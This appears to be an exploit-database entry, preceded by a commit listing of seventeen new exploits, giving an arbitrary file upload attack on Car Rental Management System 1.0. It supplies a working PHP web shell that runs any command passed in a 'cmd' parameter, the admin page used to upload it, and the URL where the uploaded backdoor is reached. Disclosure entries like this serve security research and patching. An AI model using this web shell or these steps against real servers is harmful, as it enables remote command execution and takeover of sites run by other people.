99b2cc4c13
17 changes to exploits/shellcodes Online Library Management System 1.0 - Arbitrary File Upload Ajenti 2.1.36 - Remote Code Execution (Authenticated) Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection Car Rental Management System 1.0 - Arbitrary File Upload User Registration & Login and User Management System 2.1 - SQL Injection Point of Sales 1.0 - 'id' SQL Injection Lot Reservation Management System 1.0 - Authentication Bypass Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored) Gym Management System 1.0 - 'id' SQL Injection Point of Sales 1.0 - 'username' SQL Injection School Faculty Scheduling System 1.0 - 'id' SQL Injection School Faculty Scheduling System 1.0 - 'username' SQL Injection Gym Management System 1.0 - Authentication Bypass Gym Management System 1.0 - Stored Cross Site Scripting Bludit 3.9.2 - Auth Bruteforce Bypass TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)
21 lines
No EOL
979 B
Text
21 lines
No EOL
979 B
Text
# Exploit Title: Car Rental Management System 1.0 - Arbitrary File Upload
|
|
# Date: 22-10-2020
|
|
# Exploit Author: Jyotsna Adhana and Saurav Shukla
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
|
|
# Version: 1.0
|
|
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
|
|
|
|
|
|
#Vulnerable Page: http://localhost/carRental/admin/index.php?page=manage_car
|
|
|
|
#Exploit
|
|
Fill details
|
|
Create php shell code with below script
|
|
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
|
|
Click on Browse
|
|
Select php file
|
|
Click Save
|
|
Access below URL:
|
|
http://localhost/carRental/admin/assets/uploads/cars_img/1603387740_backdoor.php?cmd=sysinfo
|
|
add system commands after cmd to execute it. |